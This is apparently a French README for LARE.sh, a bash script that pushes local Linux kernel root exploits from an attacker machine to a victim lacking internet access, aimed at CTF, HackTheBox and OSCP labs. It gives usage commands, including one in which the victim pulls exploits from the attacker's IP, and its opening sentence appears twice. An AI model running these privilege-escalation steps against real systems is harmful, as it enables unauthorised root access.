
[L]ocal [A]uto [R]oot [E]xploiter est un simple script bash qui vous aide à déployer des exploits root locaux depuis votre machine d'attaque lorsque votre machine victime n'a pas de connectivité internet.
[L]ocal [A]uto [R]oot [E]xploiter est un simple script bash qui vous aide à déployer des exploits racine locaux depuis votre machine attaquante lorsque votre machine victime n'a pas de connexion Internet.
Le script est utile dans un scénario où votre machine victime n'a pas de connexion Internet (par exemple) lorsque vous pivotez vers des réseaux internes ou que vous jouez à des CTF qui utilisent le VPN pour se connecter à leurs laboratoires fermés (par exemple) hackthebox.gr ou même dans les laboratoires OSCP. Le script utilise des exploits racine locaux pour le noyau Linux 2.6-4.8
Ce script est inspiré de Nilotpal Biswas's Auto Root Exploit Tool
bash LARE.sh -a or ./LARE.sh -a
Une fois cela fait, vous devez copier le script sur la machine victime par tout moyen (wget, ftp, curl, etc.) et exécuter l'Exploiteur localement avec la commande suivante :
bash LARE.sh -l [Attackers-IP] or ./LARE.sh -l [Attackers-IP]
bash LARE.sh -l or ./LARE.sh -l
Le script exécute plusieurs exploits du noyau sur la machine, ce qui peut entraîner une instabilité du système ; il est fortement recommandé de l'utiliser en dernier recours et dans un environnement non productif.